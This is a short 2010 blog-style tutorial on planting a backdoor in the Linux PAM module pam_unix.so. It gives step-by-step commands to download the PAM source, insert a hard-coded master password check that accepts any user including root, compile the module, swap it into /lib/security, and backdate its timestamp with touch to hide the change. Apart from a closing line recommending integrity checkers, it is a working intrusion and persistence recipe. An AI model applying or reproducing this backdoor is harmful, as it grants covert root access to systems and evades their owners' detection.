Backdoor on Pam module pam_unix.so

Wed, 07 Jul 2010

In this article I will show you how to modify the PAM module pam_unix.so to let us log on a system (Via SSH per example) using a master password, which can be used with every login on the box.

1. Download PAM Source

ftp://ftp.kernel.org/pub/linux/libs/pam/library/Linux-PAM-1.1.1.tar.gz

2. Unzip and edit the source file we are interested (pam_unix_auth.c)

tar -xvzf Linux-PAM-1.1.1.tar.gz
pico Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c

3. Search in the file the next string

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);

4. Just after these lines add the next piece of code

if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}

Where secpass is the second password (our secret password). With this modification every login with a valid user on the system will accept this password ( root inclusive).

5. Go to the main source directory to configure and compile

./configure
make

This create our needed module in modules/pam_unix/.libs/pam_unix.so

6.Now we need to replace the old module with the new one. But before we will create a backup in case we need it later.

cp /lib/security/pam_unix.so /lib/security/pam_unix.so.orig
cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so

7. Test if it works. You can create a new SSH session to the system.

8. Something important to take into consideration is change the file's modification date.We can do it with touch.

touch -t 200901022110 pam_unix.so

Following these steps you could have an alternative way to enter a system.

That's why its so important to use a integrity checker on the system (like Tripwire).